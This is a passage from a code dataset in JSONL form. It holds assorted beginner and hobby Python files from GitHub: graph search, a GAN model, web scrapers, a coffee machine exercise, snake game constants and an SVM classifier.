4]:\n g.add_node(key)\n g.add_edge(1, 2)\n g.add_edge(2, 3)\n g.add_edge(3, 4)\n g.add_edge(4, 1)\n print(g)\n parent, levels = bfs(g, 1)\n print(parent, levels)\n","repo_name":"jlin22/algs_ds","sub_path":"python/graphs/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10212466446","text":"def hello():\r\n print(\"hello world this is just a test\")\r\n\r\nisRunning = True\r\n\r\n\r\ndef MyStrip(word):\r\n newWord = \"\"\r\n for letter in word: \r\n if(letter) == \" \":\r\n continue\r\n newWord = newWord + letter\r\n return newWord\r\n\r\nwhile isRunning:\r\n command = input(\" >> \")\r\n command = MyStrip(command)\r\n if(command.lower() == \"do\"):\r\n hello()\r\n elif command.lower()==\"exit\":\r\n isRunning = False\r\n\r\n\r\n","repo_name":"AhmedSama/python-chatroom","sub_path":"chat room python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19045778155","text":"\n__name__ = 'notebook_wide_screen'\n\n__version__ = '0.1.1'\n\n__description__ = 'Enable user to display notebook in very wide screens - if notebook is trusted'\n__author__ = 'oscar6echo'\n__author_email__ = 'olivier.borderies@gmail.com'\n__url__ = 'https://github.com/oscar6echo/{}'.format(__name__)\n__download_url__ = 'https://github.com/oscar6echo/{}/tarball/{}'.format(__name__,\n __version__)\n__keywords__ = ['python', 'display', 'css']\n__license__ = 'MIT'\n__classifiers__ = ['Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ]\n__include_package_data__ = True\n__package_data__ = {\n 'templates':\n ['templates/main.html',\n 'templates/wideScreen.css',\n 'templates/notice_long.md',\n 'templates/notice_safe.txt',\n 'templates/notice_short.md',\n ]\n}\n","repo_name":"oscar6echo/notebook-wide-screen","sub_path":"notebook_wide_screen/__meta__.py","file_name":"__meta__.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25731294466","text":"import torch\nfrom torch import nn\nfrom .translation_generator import Generator\nfrom .discriminator_wrapper import DiscriminatorWrapper\nfrom .discriminator_loss import DiscriminatorLoss\nfrom .perceptual_loss import FeatureExtractor\nfrom itertools import chain\nfrom src import utils\nfrom torch.autograd import Variable\nimport os\n\n\n\nclass Model(nn.Module):\n\n def __init__(self, opt):\n super(Model, self).__init__()\n\n self.gpu_id = opt.gpu_ids[0]\n self.weights_path = os.path.join(opt.experiment_path, 'checkpoints')\n\n # Generators\n self.gen_B = Generator(opt, 'B', opt.gen_type_name_B)\n\n # Discriminators\n self.dis_B = DiscriminatorWrapper(opt, 'B')\n\n # Load weights\n utils.load_checkpoint(self, opt.which_epoch, opt.pretrained_gen_path)\n\n # Print architectures\n print('\\nGen A to B\\n')\n num_params = 0\n for p in self.gen_B.parameters():\n num_params += p.numel()\n print(self.gen_B)\n print('Number of parameters: %d' % num_params)\n\n print('\\nDis B\\n')\n num_params = 0\n for p in self.dis_B.parameters():\n num_params += p.numel()\n print(self.dis_B)\n print('Number of parameters: %d' % num_params)\n\n self.gen_params = self.gen_B.parameters()\n\n self.dis_params = self.dis_B.parameters()\n\n # Losses\n self.crit_dis_B = DiscriminatorLoss(opt, self.dis_B)\n\n # If an encoder is required, load the weights\n if (opt.mse_loss_type_B == 'perceptual' or\n hasattr(self, 'dis_B') and self.dis_B.use_encoder):\n\n # Load encoder\n if opt.enc_type[:5] == 'vgg19':\n layers = '1,6,11,20,29'\n\n self.enc = FeatureExtractor(\n input_range='tanh',\n net_type=opt.enc_type,\n layers=layers).eval()\n\n print('')\n print(self.enc)\n print('')\n\n else:\n\n self.enc = None\n\n self.crit_mse_A = utils.get_criterion(\n opt.mse_loss_type_A, \n opt.mse_loss_weight_A,\n self.enc)\n\n # Pretrained aux classifier/regressor\n if opt.pretrained_aux_path:\n\n self.aux = torch.load(opt.pretrained_aux_path)\n\n self.crit_aux_B = utils.get_criterion(\n opt.aux_loss_type, \n opt.gen_aux_loss_weight,\n self.enc)\n\n print('')\n print(self.aux)\n print('')\n\n # In case domains have different sizes, this is needed for mse loss\n scale_factor = opt.img_size_B // opt.img_size_A\n\n self.down = nn.AvgPool2d(scale_factor)\n self.up = nn.Upsample(\n scale_factor=scale_factor, \n mode='bilinear',\n align_corners=False)\n\n # Load onto gpus\n self.gen_B = nn.DataParallel(self.gen_B.cuda(self.gpu_id), opt.gpu_ids)\n self.dis_B = nn.DataParallel(self.dis_B.cuda(self.gpu_id), opt.gpu_ids)\n if hasattr(self, 'aux'):\n self.aux = nn.DataParallel(self.aux.cuda(self.gpu_id), opt.gpu_ids)\n if self.enc is not None: \n self.enc = nn.DataParallel(self.enc.cuda(self.gpu_id), opt.gpu_ids)\n\n def forward(self, inputs):\n\n if len(inputs) == 4:\n real_A, real_A_aux, _, real_B_aux = inputs\n\n # Input images\n self.real_A = Variable(real_A.cuda(self.gpu_id))\n\n self.real_A_aux = Variable(real_A_aux.cuda(self.gpu_id))\n self.real_B_aux = Variable(real_B_aux.cuda(self.gpu_id))\n\n # Fake images \n self.fake_B = self.gen_B(self.real_A, self.real_B_aux)\n\n def backward_G(self):\n\n # Cycle loss\n cycle_A = self.gen_B(self.down(self.fake_B), self.real_A_aux)\n\n self.loss_cycle_A = self.crit_mse_A(cycle_A, self.real_A)\n\n # MSE loss\n loss_mse_A = self.loss_cycle_A\n\n # GAN loss\n loss_dis_B, _, _ = self.crit_dis_B(\n img_real_dst=self.fake_B,\n aux_real_dst=self.real_B_aux,\n enc=self.enc)\n\n loss_G = loss_mse_A + loss_dis_B\n\n if hasattr(self, 'crit_aux_B'):\n fake_B_aux = self.aux(self.fake_B)\n self.loss_auxil_B = self.crit_aux_B(fake_B_aux, self.real_B_aux)\n loss_G += self.loss_auxil_B\n\n if self.training:\n loss_G.backward()\n\n # Get values for visualization\n self.loss_cycle_A = self.loss_cycle_A.data.item()\n\n # Get values for visualization\n if hasattr(self, 'crit_aux_B'):\n self.loss_auxil_B = self.loss_auxil_B.data.item()\n\n def backward_D(self):\n\n loss_dis_B, self.losses_adv_B, losses_aux_B = self.crit_dis_B(\n img_real_dst=self.real_A, \n img_fake_dst=self.fake_B.detach(),\n aux_real_dst=self.real_A_aux,\n enc=self.enc)\n\n if losses_aux_B: self.losses_aux_B = losses_aux_B\n\n loss_D = loss_dis_B\n\n if self.training:\n loss_D.backward()\n\n def train(self, mode=True):\n\n self.training = mode\n \n self.gen_B.train(mode)\n self.dis_B.train(mode)\n self.crit_dis_B.train(mode)\n\n return self","repo_name":"new-okaerinasai/ecal_5d","sub_path":"models/stargan.py","file_name":"stargan.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18257228996","text":"# -*- coding:utf-8 -*-\n\n#pip install requests\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\n\n\nurl='https://comic.naver.com/webtoon/weekdayList.nhn?week=thu'\nresp = requests.get(url)\n\n\n#print(resp.text) # --res.text는 문자열객체 \nsoup = BeautifulSoup(resp.text, 'html.parser')\n#print(soup) #-- 태그 하나하나가(ex.</script>) 객체화되어 내가 원하는 것만 잘라서 올 수있음.\n\n#제목[별점]\n\n\nimg_list = soup.find('ul',class_='img_list')\n\nwebtoons = img_list.select('dl')\n\nlst = list()\nfor webtoon in webtoons:\n title = webtoon.find('a')['title']\n star = webtoon.find('strong').text\n print('{} [{}]'.format(title, star))\n tmp = {} #dic #{}는 set or dictionary\n tmp['title'] = title\n tmp['star'] = star\n lst.append(tmp)\n \n\n#print(lst)\nres = {}\nres['webtoons'] = lst\nres_json = json.dumps(res, ensure_ascii=False) #한글인코딩 \nprint(res_json)\n\nwith open('webtoons.json','w',encoding='utf-8') as f: #파일로 저장\n f.write(res_json) \n\n","repo_name":"moonhyeji/Python","sub_path":"Python02/crawling/naver/webtoon.py","file_name":"webtoon.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3655126150","text":"#SECTION TO CHECK THE OBJECT IN THE SCENE\r\n\r\nimport maya.cmds as cmds\r\n\r\n#GLOBAL VARIABLE TO CONTAIN THE FINAL CORRECT LIST\r\nObjListShape=[]\r\nLogList=[]\r\nUVList=[]\r\n\r\n#FUNCTIONS\r\n#THIS ONE TO SUBTRACT ELEMENT FROM A LIST IF THEY ARE INSIDE THE LIST, INPUT ARE 2 LISTS\r\ndef RemoveFromList(startinglist,subtractlist):\r\n for element in subtractlist:\r\n if element in startinglist:\r\n startinglist.remove(element)\r\n return startinglist\r\n\r\n'''-------------------------------------------------------------------------------------------------------------'''\r\n\r\n#HERE WE NEED TO CHECK ALL THE ELEMENTS INSIDE THE SCENE\r\n#OBJ TO AVOID >> GROUPS, CAMERAS [_GRP IS THE STANDARD FOR GROUPS NAME]\r\n\r\ndef InDaScene():\r\n\r\n #1 OBTAIN ALL THE OBJECT IN THE SCENE\r\n cmds.select(allDagObjects=True)\r\n list_scene=cmds.ls(orderedSelection=True)\r\n\r\n #3 OBTAIN A LIST OF GROUPS\r\n suffix='_GRP'\r\n list_groups=[]\r\n\r\n for element in list_scene:\r\n if suffix in element:\r\n list_groups.append(element)\r\n\r\n #JUST SUBTRACTING THE TWO LIST WITH THE FUNCTION CREATED ABOVE\r\n ObjListShape.extend(RemoveFromList(list_scene,list_groups))\r\n\r\n #IF EMPTY >> I ADD THE VALUE TO THE LOGLIST \r\n #ELSE WE WILL CREATE A SEPARATE LIST FOR OBJ AND UVSET THAT WE WILL USE INTO ANOTHER FUNCTION >> THE ONE THAT WILL CORRECT THE UVS IF WRONG\r\n if ObjListShape==[]:\r\n LogList.append('empty') \r\n else:\r\n for obj in ObjListShape:\r\n cmds.select(obj,add=True)\r\n UVList.append(cmds.polyUVSet(obj,query=True,allUVSets=True))\r\n\r\n return ObjListShape,LogList,UVList\r\n\r\n#HERE WE EXCUTE THE FUNCTION TO GAVE THE RESULT TO ANOTHER MODULE\r\n#InDaScene()","repo_name":"MariaGiuliaButto/Checker","sub_path":"Checker/Custom_Functions/SceneDetection.py","file_name":"SceneDetection.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"105154597","text":"def calcDist(lat1,long1,lat2,long2):\n import math\n delta_lat = abs(math.radians(lat1)-math.radians(lat2))\n mean_lat = 0.5*(math.radians(lat1)+math.radians(lat2))\n delta_long = abs(math.radians(long1)-math.radians(long2))\n R = 3958.761 # radius of the Earth in statute miles\n D_sq = (R**2)*(delta_lat**2+(math.cos(mean_lat)*delta_long)**2)\n return D_sq\n\n\ndef filterResults(latitude,longitude,query_results):\n from operator import itemgetter\n uniquelocations = []\n distarray = []\n for i,entry in enumerate(query_results):\n loc_latlong = [float(entry[1]),float(entry[2])]\n # This is bad hack to get rid of duplicates by just throwing out any additional titles at that location.\n if loc_latlong not in uniquelocations:\n uniquelocations.append(loc_latlong)\n location_identifier = uniquelocations.index(loc_latlong)\n dsq = calcDist(latitude,longitude,float(entry[1]),float(entry[2]))\n notes = formatNotes(entry[3])\n distarray.append([entry[0],entry[1],entry[2],notes,entry[4],entry[5],location_identifier,dsq])\n \n distarray_sorted = sorted(distarray,key=itemgetter(7))\n \n return_array = []\n iterator = 0\n returned_locations = 0\n while len(return_array)<=10 and iterator<len(query_results):\n entry = distarray_sorted[iterator]\n return_array.append([entry[0],entry[1],entry[2],entry[3],entry[4],entry[5]])\n iterator = iterator+1\n \n #print distarray_sorted\n return return_array\n \ndef formatNotes(notes):\n notes = notes.strip(' ')\n notes = notes.strip('(')\n notes = notes.strip(')')\n firstletter = notes[0].upper()\n newnotes = firstletter+notes[1:]+'.'\n return newnotes\n\ndef searchNearby(db,latitude,longitude,lrange):\n # Select statement is very long. Break into pieces for readability\n select_statement = 'SELECT title,latitude,longitude,notes,image_url,address FROM locations_with_description WHERE '\n where_statement1 = 'latitude > %f AND latitude < %f' % (latitude-lrange,latitude+lrange)\n where_statement2 = ' AND longitude > %f AND longitude < %f' % (longitude-lrange,longitude+lrange)\n notes_statement = ' AND notes IS NOT NULL;'\n thisquery = select_statement+where_statement1+where_statement2+notes_statement\n db.query(thisquery)\n query_results = db.store_result().fetch_row(maxrows=0)\n return query_results","repo_name":"PhysB/Insight","sub_path":"app_helperfunctions.py","file_name":"app_helperfunctions.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"12673827278","text":"import numpy as np\n\na_d = 8\nv_c = -4\ntimestamp = np.arange(0,2,0.01)\n\nv_d = lambda time : a_d*time\ndel_sd = lambda time : a_d/2 * pow(time,2)\ndel_sa = lambda del_sd: del_sd/-2\n\nv_a = lambda time : a_d/-2*time\n# v_b = lambda time : v_c/2\nv_arb = lambda v_a,v_b : v_a - v_b\n\n# theta = 150\n# v_radian = r_d(theta_d,theta)\n# v_theta = r(theta) * theta_d\n# print (v_radian)\n# print (v_theta)\n\n\nvd_stamp = [ v_d(t) for t in timestamp]\ndel_sd = [ del_sd(t) for t in timestamp ]\ndel_sa = [ del_sa(sd) for sd in del_sd ]\n\nv_a = [ v_a(t) for t in timestamp]\n# v_b = [ v_b(t) for t in timestamp]\nv_b = v_c/2\nv_arb = [ v_arb(a,v_b) for a in v_a]\n\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Bar, Grid, Line\n\nposition = (\n Line()\n .add_xaxis(xaxis_data=timestamp)\n .add_yaxis(\n series_name=\"displacement_D\",\n y_axis=del_sd,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False),\n )\n .add_yaxis(\n series_name=\"displacement_A\",\n y_axis=del_sa,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False),\n )\n # International System of Units (SI) mm\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"Pulley System\", subtitle=\"accerlation d = %s m/s2 \" %(a_d) ),\n tooltip_opts=opts.TooltipOpts(trigger=\"axis\", axis_pointer_type=\"cross\"),\n yaxis_opts=opts.AxisOpts(\n type_=\"value\",\n axistick_opts=opts.AxisTickOpts(is_show=True),\n splitline_opts=opts.SplitLineOpts(is_show=True),\n ),\n xaxis_opts=opts.AxisOpts(type_=\"category\", boundary_gap=True),\n )\n \n)\n\nspped = (\n Line()\n .add_xaxis(xaxis_data=timestamp)\n .add_yaxis(\n series_name=\"velocity_A\",\n y_axis=v_a,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False),)\n\n .add_yaxis(\n series_name=\"velocity_A/B\",\n y_axis=v_arb,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False))\n\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"Relative speed\", subtitle=\"v_c = %s m/s \"%(v_c),\n pos_bottom=\"48%\"),\n tooltip_opts=opts.TooltipOpts(trigger=\"axis\", axis_pointer_type=\"cross\"),\n legend_opts=opts.LegendOpts(pos_bottom=\"48%\"),\n xaxis_opts=opts.AxisOpts(type_=\"category\", boundary_gap=False,\n # min_=0,\n # max_=200,\n # # interval=1,\n # axislabel_opts=opts.LabelOpts(formatter=\"{value} s\"),\n # axistick_opts=opts.AxisTickOpts(is_show=True),\n # splitline_opts=opts.SplitLineOpts(is_show=True),\n ),\n\n\n )\n)\n\n\n\n\ngrid = (\n Grid()\n .add(position, grid_opts=opts.GridOpts(pos_bottom=\"60%\"))\n .add(spped, grid_opts=opts.GridOpts(pos_top=\"60%\"))\n .render(\"pulley_ad%s_vc%s.html\" %(a_d,v_c) ) \n)","repo_name":"jinsanity07git/UWMnotebook","sub_path":"docs/CE202/lab/numerical/inlab5.py","file_name":"inlab5.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25403418301","text":"# currency\nQUARTERS = 0.25\nDIMES = 0.10\nNICKLES = 0.05\nPennies = 0.01\n\nMENU = {\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24\n },\n \"price\": 2.50,\n\n },\n 'espresso': {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18},\n \"price\": 1.50,\n\n }\n ,\n 'cappuccino': {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24},\n \"price\": 2.50}\n}\nprofit = 0\n\nresources = {\n \"coffee\": 100,\n \"water\": 300,\n \"milk\": 200\n}\n\n\ndef is_resource_sufficient(order_ingredients):\n \"\"\"Returns True when order can made, False if ingredients are insufficient\"\"\"\n for item in order_ingredients:\n if order_ingredients[item] >= resources[item]:\n print(\"Sorry there is not enough water.\")\n return False\n return True\n\n\ndef process_coins():\n print(\"Please insert coin.\")\n total = int(input(\"how many quarters?: \")) * 0.25\n total += int(input(\"how many dimes?: \")) * 0.1\n total += int(input(\"how many nickles?: \")) * 0.05\n total += int(input(\"how many pennies?: \")) * 0.01\n print(total)\n return total\n\n\ndef is_transaction_successful(money_received, drink_cost):\n \"\"\"Return True when payment is accepted, or False if money is insufficient\"\"\"\n if money_received >= drink_cost:\n change = round(money_received - drink_cost, 2)\n print(f\"Here's is ${change} in change.\")\n global profit\n profit += drink_cost\n return True\n else:\n print(\"Sorry that's not enough money. Money refunded.\")\n return False\n\n\ndef make_coffee(drink_name, order_ingredients):\n \"\"\"Deduct the required ingredients from the resources.\"\"\"\n for item in order_ingredients:\n resources[item] -= order_ingredients[item]\n print(f\"Here is your {drink_name}☕. Enjoy!\")\n\n\nis_on = True\nwhile is_on:\n choice = input(\"What would you like? (espresso, latte, cappuccino): \")\n if choice == 'off':\n is_on = False\n elif choice == 'report':\n print(f\"Coffee {resources['coffee']}g.\")\n print(f\"Water {resources['water']}ml.\")\n print(f\"Milk {resources['milk']}ml.\")\n print(f\"Money ${profit}.\")\n else:\n drink = MENU[choice]\n if is_resource_sufficient(drink[\"ingredients\"]):\n payment = process_coins()\n if is_transaction_successful(payment, drink[\"price\"]):\n make_coffee(choice, drink[\"ingredients\"])\n\n # flavours\n\n # if choice == 'latte':\n # choose = 'LATTE'\n # num = 'LATTE'\n #\n # elif choice == 'espresso':\n # choose = MENU[0]['NAME']\n # num = 'ESPRESSO'\n #\n # elif choice == 'pennies':\n # choose = Pennies\n # num = 'CAPPUCCINO'\n #\n # if choice == 'off':\n # turn_on = False\n\n #\n # def coffee_machine(Water=MENU[num]['WATER'], Milk=MENU[num]['Milk'], Coffee=MENU[num]['NAME'], MONEY=MONEY):\n #\n #\n #\n # print(\"Please insert coins.\")\n # quarters = int(input(\"How many quarters?: \"))\n # dimes = int(input(\"How many dimes?: \"))\n # nickles = int(input(\"How many nickles?: \"))\n # pennies = int(input(\"How many pennies?: \"))\n # total_money = ((QUARTERS * quarters) + (DIMES * dimes) + (nickles * NICKLES) + (Pennies * pennies))\n #\n # Water -= MENU[num]['WATER']\n # if WATER < MENU[num]['WATER']:\n # print(\"Sorry their is not enough water.\")\n #\n # elif total_money < MENU[num]['PRICE']:\n # MONEY -= total_money\n # print(\"Sorry that's not enough money. Money refunded\")\n # elif total_money > MENU[num]['PRICE']:\n # MONEY += MENU[num]['PRICE']\n # print(f\"Here is ${total_money - MENU[num]['PRICE']} in change.\")\n # print(f\"Here is your little {choice} enjoy!\")\n #\n #\n # coffee_machine()\n","repo_name":"code-sharad/Python_p","sub_path":"coffe_machine/coffe_machine.py","file_name":"coffe_machine.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40384154808","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\nfrom pandas import DataFrame as df\nimport pandas as pd\n\ndef scrape_products():\n\tproduct_dict = {}\n\t\n\tpage = requests.get(\"https://www.sephora.com/shop/foundation-makeup\")\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\n\t# find all products on the foundations page\n\tproducts = soup.find_all('a', {'class': 'css-ix8km1'})\n\n\t# store found titles and link in the lists AND IMAGES\n\tproduct_links = []\n\tproduct_titles = []\n\n\tfor i in products:\n\t\ttitle = i.get('aria-label') # titles of the foundation product\n\t\thref = i.get('href') # link to the foundation product\n\t\t\n\t\tproduct_dict[title] = href\n\t\t\n\t\tproduct_links.append(hrefs)\n\t\tproduct_titles.append(title)\n\t\n\ndef scrape_swatches(link):\n\tswatch_titles = []\n\tswatch_links = []\n\tswatch_dict = {}\n\n# find swatched for selected product\n\tpage = requests.get('https://www.sephora.com' + link)\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\tswatches = soup.find_all('button', {'data-at': 'selected_swatch'}) # find all shades of foundation \n# \tswatch_imgs = soup.find_all('img') #find all images of the shades of foundations \n\t\n\tfor swatch in swatches:\n\t\tswatch_name = swatch.get('aria-label') # name of the shade\n\t\tswatch_imgs = soup.find_all('img') #find all images of the shades of foundations \n\t\t\n\t\tfor img in swatch_imgs:\n\t\t\tswatch_img = img.get('src')\n\t\t\tif swatch_img.startswith('/productimages/sku/') and swatch_img.endswith('+sw.jpg'):\n\t\t\t# 'www.sephora/...' + swatch_link\n\t\t\t#swatch_links.append(swatch_img)\n\t\t\t#print(swatch_img)\n\t\t\t\tswatch_dict[swatch_name] = swatch_img\n\tprint(swatch_dict)\n\t\n\n\n\t\nscrape_products()\nscrape_swatches('/product/pro-filtr-soft-matte-longwear-foundation-P87985432?icid2=products%20grid:p87985432')","repo_name":"alina-g/foundation-match","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24188727414","text":"from . import tools\nimport os, sys\n\n# 窗口大小\nScreenWidth, ScreenHeight = 800, 600\nScreenSize = ScreenWidth, ScreenHeight\n\n# 绝对目录\n# bathPath = 'D:/Code/Python/WorkSpace/Snack_1.0.1/'\n# 相对目录\nbathPath = ''\ndef resource_path(relative_path):\n if getattr(sys, 'frozen', False): #是否Bundle Resource\n base_path = sys._MEIPASS\n else:\n base_path = os.path.abspath(\".\")\n return os.path.join(base_path, relative_path)\n# 字体\n# FONT ='SimHei'\nFONT = '隶书,dengxian,SimHei'\n# FONT = 'script' 花体,仅英文\n# FONT = 'dengxian'\n#\n\n# 颜色 - 挑选自: https://wenku.baidu.com/view/823dca44b307e87101f6961b.html\nwhiltColor = (255, 255, 255)\nblackColor = (0, 0, 0)\npinkColor = (255, 192, 203)\npurpleColor = (96, 135, 176)\nblueColor = (0, 191, 255)\ngreenColor = (0, 250, 154)\ngreenColorDark = (107, 142, 35)\nyelloColor = (255, 255, 0)\ngoldColor = (255, 215, 0)\nbrownColor = (184, 134, 11)\norangeColor = (255, 165, 0)\nredColor = (255, 0, 0)\nredColorDark = (178, 34, 34)\n\n# 游戏速度,Normal == 10\nSpeed = [300, 200, 100, 50]\n\n# 光标\nCursorSize = 30, 30\nCursorPosition = [[170, 200], [170, 300], [170, 400], [170, 500]]\n\n# info\nMainInfo = ['开始游戏', '难度选择', '边界判定', '游戏模式']\nMainInfoPosition = [(220, 190),(220, 290),(220, 390),(220, 490)]\nModeInfo = [[''], ['Easy', 'Normal', 'Hard', 'Impossible'], ['Die', 'Cross'], ['Single', 'Double', 'Auto', 'Man Vs AI']]\nModeInfoPosition = [(520, 205),(520, 305),(520, 405),(520, 505)]\n\n# 模式的选择信息\nmode = [0, 1, 0, 0]\ndef updateMode(newMode):\n global mode\n mode = newMode\nlevel = 1\n\n# 游戏得分\nscore = 0\ndef addScore(value):\n global score\n score += value\n\nscoreP1 = 0\ndef addScoreP1(value):\n global scoreP1\n scoreP1 += value\n\nscoreP2 = 0\ndef addScoreP2(value):\n global scoreP2\n scoreP2 += value\n\n# 蛇的长度\nlenthP1 = 3\ndef updateP1(lenth):\n global lenthP1\n lenthP1 = lenth\n\nlenthP2 = 3\ndef updateP2(lenth):\n global lenthP2\n lenthP2 = lenth\n\n# 运行时间\n\ntimer = 0\ndef updateTimer(value):\n global timer\n timer = value\n","repo_name":"Withinlover/Retro-Snaker-via-pygame","sub_path":"source/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71135315192","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n\n def _brute_force():\n # time limit exceeded\n if s is '':\n return 0\n\n substring_dict = {}\n\n for i in range(len(s)):\n for j in range(1, len(s)):\n if len(s[i:j]) >= 1:\n if s[j] in s[i:j]:\n break\n\n substring_dict[s[i:j+1]] = len(s[i:j+1])\n\n if not bool(substring_dict):\n return 1\n\n return max(substring_dict.values())\n\n substring_dict = {}\n\n if len(s) > 0:\n substring_dict[s[0]] = 1\n elif len(s) == 0:\n return 0\n\n start_i, end_i = 0, 1\n while end_i < len(s):\n\n if s[end_i] in s[start_i:end_i]:\n start_i = s[start_i:end_i].index(s[end_i]) + start_i + 1\n end_i += 1\n continue\n else:\n end_i += 1\n\n substring_dict[s[start_i:end_i]] = len(s[start_i: end_i])\n\n return max(substring_dict.values())\n\n\nif __name__ == '__main__':\n solution = Solution()\n\n result = solution.lengthOfLongestSubstring(\"bbtablud\")\n print(result)","repo_name":"atozto9/algorithm","sub_path":"leetcode/top-100/003-longest_substring_without_repeating_characters.py","file_name":"003-longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41231300373","text":"import numpy as np\n\n\n\nclass SVM():\n def __init__(self):\n \"\"\"\n Initialises Softmax classifier with initializing\n weights, alpha(learning rate), number of epochs\n and regularization constant.\n \"\"\"\n self.w = None\n self.alpha = 0.01\n self.epochs = 300\n self.reg_const = 0.04\n\n def calc_gradient(self, X_train, y_train):\n \"\"\"\n Calculate gradient of the svm hinge loss.\n\n Inputs have dimension D, there are C classes, and we operate on minibatches\n of N examples.\n\n Inputs:\n - X_train: A numpy array of shape (N, D) containing a minibatch of data.\n - y_train: A numpy array of shape (N,) containing training labels; y[i] = c means\n that X[i] has label c, where 0 <= c < C.\n\n Returns:\n - gradient with respect to weights W; an array of same shape as W\n \"\"\"\n\n\n\n '''for i in range(len(X_train)):\n\n for classes in set(y_train):\n if classes != y_train[i]:\n calculation=self.w[j].T.dot(X_train[i])-self.w[class_i].T.dot(X_train[i])\n if calculation<1.0:\n self.w[j]=self.w[j]-self.alpha*X_train[i]\n self.w[y_train[i]]=self.w[y_train[i]]+self.alpha*X_train[i]\n\n\n self.w=self.w*(1/X_train.shape[0])*self.reg_const'''\n\n '''#vectorized implementation'''\n\n '''calculating the dot product of w and X_train'''\n #loss_function=X_train.dot(self.w.T)\n\n #number=range(0,X_train.shape[0])\n #number=np.array(number)\n #right_class=loss_function[number,y_train]+1\n\n '''#after getting right class loss value i will subtract from loss function and replace negative value with zero according to formula'''\n #loss_function=loss_function-np.matrix(right_class).T\n #loss_function[loss_function<0]=0\n\n #loss_function[loss_function>0]=1\n\n '''#subtracting total no of ones from the '''\n #loss_function[number,y_train]=loss_function[number,y_train]-loss_function.sum(axis=1).T\n '''#multiplying loss function with X_train'''\n #gradient=(self.alpha*X_train).T*loss_function\n #self.w=(gradient.T*self.reg_const)/X_train.shape[0]\n\n for i in range(len(X_train)):\n value=X_train[i].dot(self.w.transpose())\n class_v=np.argmax(value)\n if class_v != y_train[i] :\n self.w[class_v]=self.w[class_v]-(self.alpha*X_train[i])\n self.w[y_train[i]]=self.w[y_train[i]]+(self.alpha*X_train[i])\n\n self.w=self.w-self.w*((self.alpha*self.reg_const)/len(X_train))\n\n\n return self.w\n\n def train(self, X_train, y_train):\n \"\"\"\n Train SVM classifier using stochastic gradient descent.\n\n Inputs:\n - X_train: A numpy array of shape (N, D) containing training data;\n N examples with D dimensions\n - y_train: A numpy array of shape (N,) containing training labels;\n\n Hint : Operate with Minibatches of the data for SGD\n \"\"\"\n nrows=len(set(y_train))\n ncols=X_train.shape[1]\n self.w=np.random.random((nrows,ncols))\n batch_size_list=[]\n batchsize=100\n batch_size_list=[[X_train[size:size+batchsize],y_train[size:size+batchsize]]for size in range(0,len(X_train),batchsize)]\n\n\n for i in range(self.epochs):\n for batches in batch_size_list:\n grad_w=self.calc_gradient(batches[0],batches[1])\n\n def predict(self, X_test):\n \"\"\"\n Use the trained weights of svm classifier to predict labels for\n data points.\n\n Inputs:\n - X_test: A numpy array of shape (N, D) containing training data; there are N\n training samples each of dimension D.\n\n Returns:\n - pred: Predicted labels for the data in X_test. pred is a 1-dimensional\n array of length N, and each element is an integer giving the predicted\n class.\n \"\"\"\n pred=[]\n for i in range(len(X_test)):\n value=X_test[i].dot(self.w.transpose())\n class_v=np.argmax(value)\n pred.append(class_v)\n\n return pred\n","repo_name":"kkotha4/Machine-Learning","sub_path":"models/SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"30796467491","text":"import numpy as np\nfrom numpy import sin\nfrom 